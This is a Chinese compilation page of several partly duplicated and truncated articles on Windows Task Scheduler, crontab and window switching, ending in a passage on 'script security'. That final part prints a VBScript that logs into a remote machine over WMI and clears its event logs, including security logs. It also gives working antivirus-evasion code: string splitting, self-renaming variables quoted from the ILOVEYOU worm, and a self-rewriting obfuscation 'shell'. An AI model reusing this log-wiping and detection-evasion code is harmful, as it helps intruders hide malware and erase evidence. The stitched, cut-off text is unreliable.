挖掘Windows 任务计划 功能
“月亮的小洋裙”通过精心收集,向本站投稿了15篇挖掘Windows 任务计划 功能,下面小编为大家整理后的挖掘Windows 任务计划 功能,欢迎阅读与借鉴!
篇1:挖掘Windows 任务计划 功能
尽管“任务计划”功能很早以前就被集成到Windows系统中了,但是长期以来这项功能一直不被人们所重视;不过,在Windows Server 2008系统环境下,“任务计划”功能明显得到了强化,善于使用该功能可以大大提高系统操作效率,现在,本文就对Windows Server 2008系统进行挖掘,巧妙利用该系统中的任务计划程序安排好自己的“任务计划”,以便提高自己的工作效率!
1、对重要数据进行定时备份
伴随着信息化进程的逐步推进,以及信息技术的不断普及,各个单位对局域网网络的依赖程度也是越来越高,保存在局域网服务器中的数据信息也是越来越重要。为了防止意外发生、导致重要数据丢失,越来越多的单位开始重视数据信息的安全保护工作,而保护数据安全最常使用的方法就是及时做好数据的备份工作,于是Windows Server 2008系统特意对数据备份功能进行了强化,巧妙地用好该系统环境下的备份功能,我们可以享受到专业级别的数据保护精彩!不过,对重要数据进行备份又是一项比较麻烦的操作,很多时候用户由于某些原因会忘记定期执行备份操作。那怎样才能对重要数据进行自动定时备份呢?其实在Windows Server 2008系统环境下,我们可以巧妙地利用增强的任务计划程序来实现对重要数据进行定时备份功能,下面就是具体的实现步骤:
首先打开Windows Server 2008系统的“开始”菜单,从中依次点选“程序”/“附件”/“系统工具”/“任务计划程序”命令,进入Windows Server 2008系统的任务计划程序窗口,单击左侧列表区域中的“任务计划程序库”选项,在对应该选项的右侧列表区域中单击“操作”列表中的“新文件夹”选项,之后根据提示将新文件夹的名称设置为“智能备份”,并单击“确定”按钮返回;
其次用鼠标展开左侧列表区域中的“任务计划程序库”选项,并选中该选项下面的“智能备份”子项,在对应该子项的右侧列表区域中单击“创建任务”项目,打开创建任务设置对话框;单击该对话框中的“常规”标签,并在对应标签页面的“姓名”文本框中输入目标任务的名称,例如这里输入的是“智能备份”,该标签页面中的其余参数可以保持默认设置;
接着单击“触发器”标签,在其后弹出的标签设置页面中单击“新建”按钮,打开如图1所示的新建触发器对话框;在该对话框的“开始任务”处选中“制定计划时”选项,并任务执行的频率参数调整为“每天”,在缺省状态下Windows Server 2008系统是从任务计划创建的当天那一刻开始算起,我们不妨尝试根据实际工作要求设置任务计划执行的具体开始时间,例如我们可以将开始时间设置为“2008/8/8日20:00:00”(北京奥运会开幕那一刻);最后,单击新建触发器对话框中的“确定”按钮返回创建任务设置界面;
紧接着单击“操作”标签,在对应标签设置页面中单击“新建”按钮,在其后弹出的对话框中单击“操作”处的下拉按钮,并从下拉列表中选择“启动程序”选项,再单击“浏览”按钮打开文件选择对话框,将之前我们创建好的用来备份重要数据信息的脚本文件选中并导入进来,最后单击“确定”按钮就可以了,如此一来我们就能轻松实现对重要数据的智能备份操作了。
小提示:利用Windows Server 2008系统的任务计划程序,我们能将Windows Server 2008系统完整备份到网络共享。在进行这种备份操作时,我们需要先通过Windows Server 2008系统自带的Windows Server Backup功能先创建好一个备份到网络共享的操作任务;接着按照前面的操作步骤打开Windows Server 2008系统的任务计划程序窗口,单击右侧列表区域中的“创建基本任务”选项,再根据向导窗口的提示依次设置好新任务的名称、开始时间、开始日期,之后选中如图2所示界面中的“启动程序”选项,并且在“程序或脚本”框中直接输入Wbadmin.exe命令的详细路径“X:windowssystem32Wbadmin.exe”(其中X为Windows系统所在的磁盘分区符号),再单击“完成”按钮退出任务计划设置窗口,这样的话Windows Server 2008系统日后到了指定时间就会被智能备份到网络共享了。
2、灵活进行系统关机操作
每天下班时,我们常常需要依次点选“开始”/“关机”/“关机”选项,才能将计算机系统关闭,很显然这样关闭计算机系统有点繁琐!现在,我们可以利用Windows Server 2008系统的任务计划程序来实现灵活多变的系统关闭操作!也许有的朋友会说,这样的关机操作实在是太简单了,只需要打开Windows Server 2008系统的任务计划程序窗口,在其中创建一个新的任务,并让任务在指定时间、指定日期执行字符串命令“shutdown.exe -s”,就能实现智能关闭计算机系统操作了,
不过,要是哪一天遇到了特殊情况,Windows Server 2008系统启动了关闭系统功能后我们突然想起还有事情需要处理时,此时想通过执行字符串命令“shutdown.exe -a”来阻止系统执行关机操作时,那可能就有点来不及了;现在,我们只要借助Windows Server 2008系统的任务计划程序,并通过创建合适的脚本程序就能达到灵活多变的关闭系统目的了:
首先运行记事本程序,在弹出的文本编辑窗口中,输入下面的命令行代码:
@echo off
shutdown -s -t 60
echo 按任意键退出系统关闭操作……
echo ……
pause
shutdown -a
其中“shutdown -s -t 60”命令代码表示在1分钟内系统将会被自动关闭,该时间我们可以根据实际工作需要灵活进行设置,“shutdown -a”命令代码表示强行阻止系统执行关闭操作,不过该操作需要我们按下键盘上的任意键才能被自动执行;在确认上面的命令行代码输入无误后,依次单击文本编辑窗口中的“文件”/“保存”命令,在弹出的文件保存对话框中将上面的代码内容保存为“shutdown.bat”文件;
其次打开Windows Server 2008系统的“开始”菜单,从中依次点选“程序”/“附件”/“系统工具”/“任务计划程序”命令,进入Windows Server 2008系统的任务计划程序窗口,单击左侧列表区域中的“任务计划程序库”选项,在对应该选项的右侧列表区域中单击“创建基本任务”选项,进入任务计划创建向导窗口,当向导界面提示我们希望该任务执行什么操作时,我们可以在如图3所示的界面中选择“启动程序”选项,再单击“下一步”按钮,之后单击“浏览”按钮将之前创建好的“shutdown.bat”批处理文件选中并添加进来;
3、共享使用相同的计划任务
在局域网工作环境中,许多普通工作站都需要执行相同的计划任务,如果单独在每一台工作站中依次创建计划任务的话,显然不利于提高局域网用户的工作效率!为了有效提高工作效率,我们可以将多数局域网用户都要执行的计划任务导出来,之后发布到局域网服务器或特定共享文件夹中,让其他局域网用户共享使用。例如,执行数据备份操作可能是每一台工作站都要做的工作,我们只要将前面创建好的“智能备份”任务发布到局域网中,其他用户就能共享使用这个数据备份的计划任务了,而不需要单独在自己的工作站中重复创建数据备份计划任务了。现在,我们就针对前面的“智能备份”计划任务,来向各位朋友详细介绍一下如何共享使用相同的计划任务:
首先打开Windows Server 2008系统的“开始”菜单,从中依次点选“程序”/“附件”/“系统工具”/“任务计划程序”命令,进入Windows Server 2008系统的任务计划程序窗口,在该窗口的左侧列表区域依次点选“任务计划程序库”/“智能备份”节点选项;
接着用鼠标选中该节点下面的具体任务计划名称,例如“智能备份”计划任务,并用鼠标右键单击该计划任务名称,从弹出的快捷菜单中单击“导出”命令(如图4所示),将“智能备份”计划任务导出保存为“智能备份.xml”文件;之后,将“智能备份.xml”文件上传到局域网服务器中或特定共享文件夹中进行共享发布。当需要进行相同备份操作的工作站执行备份任务时,可以直接将“智能备份.xml”文件下载到本地工作站系统,然后打开计划任务程序窗口,单击右侧列表区域中的“操作”选项,再选择“导入任务”命令,将下载得到的“智能备份.xml”文件导入任务文件就可以了。
当然,需要提醒各位朋友的是,为了保证我们事先指定的计划任务能够自动运行,我们必须认真检查系统服务Task Scheduler工作状态是否正常,一旦该系统服务运行不正常时,我们必须立即将该服务重新启动成功,同时确保该系统服务的启动类型要设置为“自动”。此外,在共享执行相同的计划任务时,我们常常还需要对下载下来的计划任务参数进行微调,例如运行计划任务的用户账号需要调整成本地工作站的系统登录账号,运行计划任务时间也要符合自己的实际工作需要等。
小提示:在不同工作站中执行共享的计划任务程序时,常常会遇到计划任务无法成功执行的故障现象,引起这一现象最主要的原因就是任务计划操作需要调用指定的应用程序,而指定的应用程序在不同的工作站中保存的位置可能不相同,那样一来任务计划可能无法从指定的位置调用到需要的应用程序,从而导致计划任务无法被成功执行。要想解决由这种因素引起的故障现象时,我们只要重新修改相应的应用程序路径信息即可。
4、自动获取计划任务执行情况
尽管我们制定了详细的计划任务,但很多时候系统并没有按照要求执行该计划任务,这显然是我们不能忍受的,那有没有办法
篇2:挖掘Windows 任务计划巧安排
尽管“任务计划”功能很早以前就被集成到Windows系统中了,但是长期以来这项功能一直不被人们所重视;不过,在Windows Server 2008系统环境下,“任务计划”功能明显得到了强化,善于使用该功能可以大大提高系统操作效率,现在,本文就对Windows Server 2008系统进行挖掘,巧妙利用该系统中的任务计划程序安排好自己的“任务计划”,以便提高自己的工作效率!
1、对重要数据进行定时备份
伴随着信息化进程的逐步推进,以及信息技术的不断普及,各个单位对局域网网络的依赖程度也是越来越高,保存在局域网服务器中的数据信息也是越来越重要。为了防止意外发生、导致重要数据丢失,越来越多的单位开始重视数据信息的安全保护工作,而保护数据安全最常使用的方法就是及时做好数据的备份工作,于是Windows Server 2008系统特意对数据备份功能进行了强化,巧妙地用好该系统环境下的备份功能,我们可以享受到专业级别的数据保护精彩!不过,对重要数据进行备份又是一项比较麻烦的操作,很多时候用户由于某些原因会忘记定期执行备份操作。那怎样才能对重要数据进行自动定时备份呢?其实在Windows Server 2008系统环境下,我们可以巧妙地利用增强的任务计划程序来实现对重要数据进行定时备份功能,下面就是具体的实现步骤:
首先打开Windows Server 2008系统的“开始”菜单,从中依次点选“程序”/“附件”/“系统工具”/“任务计划程序”命令,进入Windows Server 2008系统的任务计划程序窗口,单击左侧列表区域中的“任务计划程序库”选项,在对应该选项的右侧列表区域中单击“操作”列表中的“新文件夹”选项,之后根据提示将新文件夹的名称设置为“智能备份”,并单击“确定”按钮返回;
其次用鼠标展开左侧列表区域中的“任务计划程序库”选项,并选中该选项下面的“智能备份”子项,在对应该子项的右侧列表区域中单击“创建任务”项目,打开创建任务设置对话框;单击该对话框中的“常规”标签,并在对应标签页面的“姓名”文本框中输入目标任务的名称,例如这里输入的是“智能备份”,该标签页面中的其余参数可以保持默认设置;
接着单击“触发器”标签,在其后弹出的标签设置页面中单击“新建”按钮,打开新建触发器对话框;在该对话框的“开始任务”处选中“制定计划时”选项,并任务执行的频率参数调整为“每天”,在缺省状态下Windows Server 2008系统是从任务计划创建的当天那一刻开始算起,我们不妨尝试根据实际工作要求设置任务计划执行的具体开始时间,例如我们可以将开始时间设置为“2008/8/8日20:00:00”(北京奥运会开幕那一刻);最后,单击新建触发器对话框中的“确定”按钮返回创建任务设置界面;
紧接着单击“操作”标签,在对应标签设置页面中单击“新建”按钮,在其后弹出的对话框中单击“操作”处的下拉按钮,并从下拉列表中选择“启动程序”选项,再单击“浏览”按钮打开文件选择对话框,将之前我们创建好的用来备份重要数据信息的脚本文件选中并导入进来,最后单击“确定”按钮就可以了,如此一来我们就能轻松实现对重要数据的智能备份操作了,
小提示:利用Windows Server 2008系统的任务计划程序,我们能将Windows Server 2008系统完整备份到网络共享。在进行这种备份操作时,我们需要先通过Windows Server 2008系统自带的Windows Server Backup功能先创建好一个备份到网络共享的操作任务;接着按照前面的操作步骤打开Windows Server 2008系统的任务计划程序窗口,单击右侧列表区域中的“创建基本任务”选项,再根据向导窗口的提示依次设置好新任务的名称、开始时间、开始日期,之后选中界面中的“启动程序”选项,并且在“程序或脚本”框中直接输入Wbadmin.exe命令的详细路径“X:\windows\system32\Wbadmin.exe”(其中X为Windows系统所在的磁盘分区符号),再单击“完成”按钮退出任务计划设置窗口,这样的话Windows Server 2008系统日后到了指定时间就会被智能备份到网络共享了。
2、灵活进行系统关机操作
每天下班时,我们常常需要依次点选“开始”/“关机”/“关机”选项,才能将计算机系统关闭,很显然这样关闭计算机系统有点繁琐!现在,我们可以利用Windows Server 2008系统的任务计划程序来实现灵活多变的系统关闭操作!也许有的朋友会说,这样的关机操作实在是太简单了,只需要打开Windows Server 2008系统的任务计划程序窗口,在其中创建一个新的任务,并让任务在指定时间、指定日期执行字符串命令“shutdown.exe -s”,就能实现智能关闭计算机系统操作了。不过,要是哪一天遇到了特殊情况,Windows Server 2008系统启动了关闭系统功能后我们突然想起还有事情需要处理时,此时想通过执行字符串命令“shutdown.exe -a”来阻止系统执行关机操作时,那可能就有点来不及了;现在,我们只要借助Windows Server 2008系统的任务计划程序,并通过创建合适的脚本程序就能达到灵活多变的关闭系统目的了:
首先运行记事本程序,在弹出的文本编辑窗口中,输入下面的命令行代码:
@echo off
shutdown -s -t 60
echo 按任意键退出系统关闭操作……
echo ……
pause
shutdown -a
其中“shutdown -s -t 60”命令代码表示在1分钟内系统将会被自动关闭,该时间我们可以根据实际工作需要灵活进行设置,“shutdown -a”命令代码表示强行阻止系统执行关闭操作,不过该操作需要我们按下键盘上的任意键才能被自动执行;在确认上面的命令行代码输入无误后,依次单击文本编辑窗口中的“文件”/“保存”命令,在弹出的文件保存对话框中将上面的代码内容保存为“shutdown.bat”文件;
其次打开Windows Server 2008系统的“开始”菜单,从中依次点选“程序”/“附件”/“系统工具”/“任务计划程序”命令,进入Windows Server 2008系统的任务计划程序窗口,单击左侧列表区域中的“任务计划程序库”选项,在对应该选项的右侧列表区域中单击“创建基本任务”选项,进入任务计划创建向导窗口,当向导界面提示我们希望该任务执行什么操作时,我们可以在如图3所示的界面中选择“启动程序”选项,再单击“下一步”按钮,之后单击“浏览”按钮将之前创建好的“shutdown.bat”批处理文件选中并添加进来
篇3:“任务计划”的另类功能
XP空间 挖掘“任务计划”的另类功能(1)
Windows XP的自带了“任务计划”,它可帮助我们在指定的时间内运行某个程序或执行某些操作,这极大的方便了众多患有“健忘症”的朋友,如果能够将“任务计划”中的潜藏功能和特殊设置发挥出来,那么它的“功效”还将会成倍增长。
让老电脑也能自启动
一些旧主板的BIOS不支持定时启动功能,如果利用“任务计划”,再结合Windows的电源管理,就可以让老电脑也能在每天清晨自动启动,唤醒处于休眠状态中的Windows XP系统。
点击“开始”→“附件”→“系统工具”→“任务计划”,打开任务计划向导。点击“下一步”,选择电脑中的某首MP3歌曲。点击“下一步”,选择设置“每天”执行任务,执行时间为“7:00”,再输入当前管理员帐户名和密码。最后选择“在单击完成时打开此任务的高级属性”。点击“完成”后,在任务计划的属性对话框中,选择“设置”选项卡,选定“唤醒计算机以运行此程序”选项。这样当关机时,如选择了“休眠”项,在每天早晨7点时,老电脑就会自动将系统唤醒,并启动相应程序播放指定的歌曲,唤醒你起床了。
一个“任务”多个“计划”
一般情况下,建立了一个任务计划后,只能在指定的时间内执行。你有没有想过让一个任务来进行多个计划呢?方法很简单,打开“任务计划”文件夹,右键点击某个计划任务,在右键菜单中选择“属性”命令,在弹出的对话框中选择“计划”选项卡。勾选“显示多项任务”项,设置计划任务的类型及执行时间后,点击“新建”按钮,就可以为该项任务添加多个执行计划了。
・XP空间 挖掘“任务计划”的另类功能(2)
任务计划与E-mail
如果你想象力足够丰富,甚至可以通过电子邮件,来发送编制好的计划任务给菜鸟,让他们通过执行计划任务,来进行某些自动操作,解决一些简单的问题,
在本机编写并添加任务计划,接着打开任务计划文件夹,选择刚添加的任务计划,在其上点击右键选择“复制”命令,之后将其“粘贴”到其它文件夹中,得到后缀名为“.job”的任务计划。最后打开Email发送窗口,将拷贝出的任务计划文件添加到附件中,通过电子邮件发送给菜鸟。当其接收后,只需将该任务计划文件拖放到“任务计划”文件夹中即可。
批量终止任务计划
某些时候,可能需要暂时停止当前系统中的所有计划任务,而打开任务计划文件夹,一个一个去逐项停止又太过繁琐。这时就可在“运行”对话框中执行“net stop Schedule”命令,来停止任务计划服务。当要恢复所有任务计划时,可在“运行” 对话框中执行命令“net start Schedule”命令,即可使所有计划任务重新启动。
快速建立任务计划
使用任务计划向导建立一项任务时,需要经过多个操作步骤。如果使用Window XP系统的AT命令,则可简化这个步骤。例如想在今天下午下班前半小时,让电脑自动播放音乐,就可在“运行”对话框中执行“AT 17:30 E:\音乐\回家.mp3”命令来实现。打开“命令行提示符”窗口,在其中输入“AT /?”命令,还可获得更多关于AT命令的用法。
・XP空间 挖掘“任务计划”的另类功能(3)
让 远离任务计划
使用AT命令非常便捷,不过 一般也是通过远程使用AT命令,来添加木马的任务计划达到入侵的目的。对于这种情况,如果不想停止任务计划服务,又不想给 任何机会,就需要限制AT添加服务的权限,使其“两全齐美”。
打开“任务计划”文件夹,点击菜单中的“高级”→“AT服务帐户”命令。在弹出窗口中,选择“本帐户”项,然后输入一个不常用的帐户名及密码。在确定后,当 使用远程攻击入侵了系统时,也无法再使用当前系统帐号添加木马的任务计划了。
查看任务计划日志
想知道 是否动了自己的任务计划?你可以查看Windows XP系统中保存的任务计划日志。只要使用记事本打开“C:\windows\SchedLgU.Txt”文件,即可在其中查看到所有任务计划的日志信息了。里面清楚的记载了任务计划服务在何时被停止或启动过,以及用户在系统中添加了哪些任务计划。
篇4:定时任务Windows系统
Crontab ----Quick Reference 快速上手 功能:要求系统在指定的时间,自动执行某个操作或者任务. 由cron守护进程(clock daemon)来实现,cron进程每分钟被唤醒一次,查看一下crontab中是否有需要执行的命令. 以Solaris为例 限制: 1.如果你的用户名出现在/usr/lib
Crontab ----Quick Reference 快速上手
功能:要求系统在指定的时间,自动执行某个操作或者任务.
由cron守护进程(clock daemon)来实现,cron进程每分钟被唤醒一次,查看一下crontab中是否有需要执行的命令.
以Solaris为例
限制:
1.如果你的用户名出现在/usr/lib/cron/cron.allow中,
你就能够执行Crontab命令,
如果系统没有cron.allow这个文件,
则如果你的名字没有出现在/usr/lib/cron/cron.deny中,
你就能够执行Crontab命令.
如果没有cron.allow文件,但是有cron.deny文件,但是cron.deny文件为空
则所有人都可以执行crontab命令
如果上面两个文件,系统都没有,则只有root可以执行Crontabl.
这两个文件的格式是: 每行一个用户名
命令:
利用EDITOR环境变量来指定crontab的编辑器, 如果想使用vi来编辑,命令如下:
#export EDITOR=vi
crontab -e #编辑你的crontab文件,如果不存在,则创建一个新的crontab文件
crontab -l #显示你的crontab文件
crontab -r #删除你的crontab文件
crontab -v #显示你最后一次修改crontab文件的时间(仅少数系统支持该命令)
crontab文件语法
* * * * * command to be executed
- - - - -
| | | | |
| | | | +----- 星期 (1 - 7) (monday = 1)
| | | +------- 月 (1 - 12)
| | +--------- 天 (1 - 31)
| +----------- 时 (0 - 23)
+------------- 分 (0 - 59)
例子:
1. 每天下午6:30,删除/home/someuser/tmp下的所有文件
30 18 * * * rm/home/someuser/tmp/*
2. 每天下午6:30, 和每天下午6:50, 删除/home/someuser/tmp下的所有文件
30,50 18 * * * rm/home/someuser/tmp/*
3.每天18:10,将/export/home下的大于1M的普通文件拷贝到/export/home/yang/cron下
10 18 * * * /usr/bin/find /export/home -type f -size +1048576c -exec cp {} /export/home/yang/cron \;
原文转自:www.ltesting.net
篇5:从95到Vista了解Windows任务切换功能
从Windows98到XP
Windows95中引入的任务栏和Cool-Switch功能运行良好,所以微软在Windows98、WindowsME和Windows中一直延续了这两个功能。因此,我们在这些版本中并没有看到对这两个功能的任何改进。
但是,当微软发布WindowsXP的时候,它们做出了一个很小的改进:taskbargrouping(任务栏分组)。这个分组功能解决了同时打开多个程序的情况下,任务栏上的按钮过于拥挤的问题。WindowsXP会把相似的窗口分成一个组,用一个按钮来表示这些窗口,这样任务栏上的按钮就减少了。这个按钮上会出现一个小箭头标记,你可以点击这个标记,系统就会弹出一个小的菜单,这个按钮所代表的所有窗口都会出现在这个菜单中。
WindowsVista
当然,WindowsVista之中仍然保留了任务栏和Cool-Switch功能,但是微软对这两个功能进行了一些奇妙的改造??主要是由于新操作系统在图形化方面做了比较大的改进。换句话说,为了使用这些新功能,你的视频卡必须运行WDDM(WindowsDriverDisplayModel)驱动,并且能够显示Aero界面。
任务栏中增加了LiveThumbnails功能,这一功能为正在运行的程序提供了一个缩略图。只要你的鼠标指针放在任务栏的按钮上,你就会看到一个非常小的缩略图,这个图像显示了这个窗口的内容。而且最妙之处在于,这个缩略图是活动的,图像中所显示的是动态的情况,比如下载的进程。
WindowsFlip
微软不仅仅加强了Cool-Switch功能,还修改了它的名字。该功能现在被称为WindowsFlip。和它的前任一样,WindowsFlip的基本功能也是通过[Alt][Tab]按键帮助你切换打开的程序。然而,它的界面却更加丰富漂亮,它用一个图标和一个缩略图来表示一个正在运行的程序。除了显示正在运行的程序的图标和缩略图,WindowsFlip还显示桌面的图标和缩略图,这样你就可以很方便地回到桌面。
而且只要WindowsFlip窗口一打开,你就可以使用方向键在图标/缩略图之间来回选择。WindowsFlip的另一个新功能是无图形模式。如果你快速地按[Alt][Tab],你就可以直接在两个最近使用的窗口之间来回切换,而不会打开WindowsFlip窗口。
WindowsFlip3D
如果觉得WindowsFlip还不够酷的话,你可以按[Windows][Tab]键,尝试一下WindowsFlip3D功能。WindowsFlip3D的基本功能和普通的Windowsflip相同,但是在细节上却有一些改进。首先WindowsFlip3D为所有打开的程序和桌面提供了一个多角的、三维的图标。
在WindowsFlip3D中,你可以使用三种方式在打开的程序之间进行切换。你仍然可以不断地按[Windows][Tab]键;你可以使用方向键来前后移动;你也可以使用鼠标上的滚轮进行选择。无论你选择哪种方式进行选择,都会出现一个缩略窗口显示程序的内容,这很象rolodex。和LiveTaskbar的缩略图功能类似,WindowsFlip3D中的这个缩略窗口也是动态的,能够显示出程序的实时状态。
篇6:Windows 7任务计划帮你自动运行程序
如果你的电脑经常需要自动运行一些程序,例如定时备份,预先设定的录像节目,与其苦苦想着设置的时间,倒不如预先设置电脑自动运行,免除后顾之忧,Windows一直都有内置的任务计划程序,可在Windows 7中的任务计划程序,可以让工作的进行更加自动化。用户除了设置定时运行某项任务,还可以根据个别程序运行情况,设置自动运行程序,使程序自动化运行更具弹性。
自动运行工作
Step1:依次打开开始/所有程序/管理工具/任务计划程序,然后在窗口右方单创建基本任务项。
Step2:输入工作的名称后,可以设置触发运行工作的条件,例如开机时运行、指定时间运行或者每隔一段时间运行,以符合不同情况的需要,
Step3:如果选择每天、每周、每月、仅一次的情况,需要更进一步设置自动工作的时间条件。
Step4:最常用的工作类型是启动程序,用作设置以指定程序运行和完成所需的工作。在Windows 7中新增的发送电子邮件及显示信息则可用作为用户提示任务信息。
Step5:启动程序的情况下,用户除了输入程序位置或命令外,还可以加入部分程序运行时需要的命令或开始位置。
Step6:如果选择发送电子邮件,用户除了要输入Email地址外,还需要输入所使用的SMTP发送服务 器,同时需要安装收发邮件的应用软件。
特别情况运行任务
Step1:如果想运行Media Center的同时,运行其他相关的媒体程序。用户可以使用当特定事件被 记录时选项作为该工作的触发程序,并输入有关的时间识别码。
Step2:要知道事件识别码,可通过控制面板/管理工具中的事件查看器查看,查看自定义记录,即可获得所需的事件识别码。
篇7:深入挖掘Windows脚本技术脚本安全
“
.write ”
目标IP:“ '也可以用navigate方法直接打开一'
.write ”
用户名:“ '个html文件,效果是一样的。'
.write ”
密码: “
.write ”
类型:“ '不仅是input对象,所有DHTML支持'
.write ”应用程序 “ '的对象及其属性、方法都可以使用。'
.write ”系统 “
.write ”安全“ '访问这些对象的办法和网页中访问'
.write ”
“ '框架内对象是类似的。'
.write ”“
.write ”“
.write ”“
end with
dim wmi '显式定义一个全局变量'
set wnd=ie.document.parentwindow '设置wnd为窗口对象'
set id=ie.document.all '设置id为document中全部对象的集合'
id.confirm.onclick=getref(”confirm“) '设置点击”确定“按钮时的处理函数'
id.cancel.onclick=getref(”cancel“) '设置点击”取消“按钮时的处理函数'
do while true '由于ie对象支持事件,所以相应的,'
wscript.sleep 200 '脚本以无限循环来等待各种事件。'
loop
sub event_onquit 'ie退出事件处理过程'
wscript.quit '当ie退出时,脚本也退出'
end sub
sub cancel '”取消“事件处理过程'
ie.quit '调用ie的quit方法,关闭IE窗口'
end sub '随后会触发event_onquit,于是脚本也退出了'
sub confirm '”确定“事件处理过程,这是关键'
with id
if .ip.value=”“ then .ip.value=”.“ '空ip值则默认是对本地操作'
if not (.app.checked or .sys.checked or .sec.checked) then 'app等都是checkbox,通过检测其checked'
wnd.alert(”至少选择一种日志“) '属性,来判断是否被选中。'
exit sub
end if
set lct=createobject(”wbemscripting.swbemlocator“) '创建服务器定位对象'
on error resume next '使脚本宿主忽略非致命错误'
set wmi=lct.connectserver(.ip.value,”root/cimv2“,.user.value,.pass.value) '连接到root/cimv2名字空间'
if err.number then '自己捕捉错误并处理'
wnd.alert(”连接WMI服务器失败“) '这里只是简单的显示“失败”'
err.clear
on error goto 0 '仍然让脚本宿主处理全部错误'
exit sub
end if
if .app.checked then clearlog ”application“ '清除每种选中的日志'
if .sys.checked then clearlog ”system“
if .sec.checked then clearlog ”security“ '注意,在XP下有限制,不能清除安全日志'
wnd.alert(”日志已清除“)
end with
end sub
sub clearlog(name)
wql=”select * from Win32_NTEventLogFile where logfilename='“&name&”'“
set logs=wmi.execquery(wql) '注意,logs的成员不是每条日志,'
for each l in logs '而是指定日志的文件对象。'
if l.cleareventlog then
wnd.alert(”清除日志“&name&”时出错!“)
ie.quit
wscript.quit
end if
next
end sub
总结一下整个过程。首先是创建internetexplorer.application对象。其直接的效果是启动了一个iexplorer进程,但窗口是不可见的,直到设置了ie.visible=1。然后用document.write方法将html语句写到ie窗口中。对于复杂的界面,可以将html代码保存为一个html文件,用ie.navigate(filename)打开,
最后是响应窗口中的输入。这基本上属于DHTML的知识范畴。
与一般脚本编程最大的不同之处,在于ie是事件驱动的。你所要做的,就是设置好相应的事件处理函数/过程。
在本例中,脚本只关心3个事件:ie退出,”确定“按钮被点击,”取消“按钮被点击。
注意,例子中只有两句设置事件处理过程的语句,没有定义ie退出事件与event_onquit过程关联。这是因为这里用到一个特性――创建ie对象时的第二个参数”event_“是一个前缀,ie对象的事件处理过程名是该前缀加事件名。所以onquit事件的处理过程默认就是event_onquit。
当点击”确定“按钮后,confirm过程被调用。例子中演示了如何访问ie中的对象,比如ie.document.all.ip.value就是在”目标IP“文本框中的输入。如果选中”应用程序“这个checkbox,那么ie.document.all.app.checked的值是true,否则是false。想调用alert方法,则用ie.document.parentwindow.alert。其他各种ie内对象的访问方法完全是类似的。具体的可以看DHTML相关资料。
有了web界面,交互就变得丰富多彩了。大家可以充分发挥创意。
比如,很多GUI工具(比如流光)启动时,有一个logo页,显示版权等信息。我们用ie对象也可以模拟一个出来:
set ie=wscript.createobject(”internetexplorer.application“)
ie.fullscreen=1
ie.width=300
ie.height=150
ie.navigate ”about:blank“
ie.left=fix((ie.document.parentwindow.screen.availwidth-ie.width)/2)
ie.top=fix((ie.document.parentwindow.screen.availheight-ie.height)/2)
ie.document.write ”
“&_
”
篇8:深入挖掘Windows脚本技术脚本安全
“
ie.visible=1
wscript.sleep 5000
ie.quit
上面这段代码执行后,将在屏幕中央显示一个连标题栏和边框都没有的ie窗口,持续5秒。
窗口里是蓝底黑字的“这是一个Logo”。
脚本GUI化之后,与用户的交互更直观。像Nmap那样有很多参数的工具,在本地使用时,写一个图形界面的“接口”就一劳永逸了。输出的结果也可以用脚本处理,以更适合阅读的方式显示,就像流光等工具能生成html扫描报告那样。
【反查杀】
首先必须说明的是,我完全没有试图挑战杀毒软件杀毒能力的意思。Windows脚本是一种解释性语言,明文保存代码。由于没有经过编译过程,代码的复杂程度远不如可执行程序(exe)。exe做不到的事,没理由指望脚本能做到。不过,正因为脚本的反查杀能力很差,以至于杀毒软件使用的查杀办法也不高级。于是我们就有机可乘了。
先看看常见的反查杀办法:
1,字符串或语句的分割/重组。
最典型的例子就是将 fso=createobject(”scripting.filesystemobject“)
变成 fso=createobject(”script“+”ing.filesyste“+”mobject“)
这种办法的扩展是用execute语句:
execute(”fso=crea“+”teobject(“”scr“+”ipting.filesy“+”stemobject“”)“)
2,变量名自动改变。
Randomize
Set f = CreateObject(”Scripting.FileSystemObject“)
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall
fS = Array(”Of“, ”vC“, ”fS“, ”fSC“)
For fSC = 0 To 3
vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)))
Next
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC
上面这段代码取自爱虫病毒,大家运行一下,就知道是怎么回事了。
3,用官方工具――脚本编码器screnc.exe[5]加密脚本。
加密后的脚本能被脚本宿主直接解释。本来这是最好的解决办法,但“枪打出头鸟”,由于加密是可逆的,现在所有的杀毒软件都有解码功能。因此这个办法的效果基本上为零。
第一个办法的有效告诉我们这样一个事实:对脚本病毒的查杀基本上是属于静态的。而且,我发现即使只是改变大小写,也能起到反查效果(只试了一种杀毒软件)。反查杀的关键是减少特征码。
对于exe的反查杀,最容易想到的就是“加壳”。在脚本上也可以应用这个办法。比如:
str=”cswpire.tohcO“” “”!K“
for i=1 to len(str) step 3
rev=rev+strreverse(mid(str,i,3))
next
execute rev
一个最简单的“壳”。“壳”的算法是每n个字符反转顺序一次。n就是算法的“种子”,本例中它等于3。
这个“壳”是死的,起不到减少特征码的效果。反而增加了特征码,如”cswpire“。
下面看一个复杂些的例子:
str=”wscript.echo “”OK!“”:randomize:key=int(rnd*8+2):str=rev:str=replace(str,chr(34),chr(34)+chr(34)):set aso=createobject(“”ADODB.Stream“”):with as.open:.writetext “”str=“”+chr(34)+str+chr(34)+“”:key=“”+cstr(key)+“”:str=rev:execute str:function rev():for i=1 to len(str) step key:rev=rev+strreverse(mid(str,i,key)):next:end function“”:.savetofile wscript.scriptfullname,2:end with“:key=1:str=rev:execute str:function rev():for i=1 to len(str) step key:rev=rev+strreverse(mid(str,i,key)):next:end function
(注意,该代码只有一行,没有回车)
保存成vbs文件,双击执行,效果还是和前一段代码一样,弹出一个对话框显示”OK!“。
但是,执行完后再看代码,可能变成了这样:
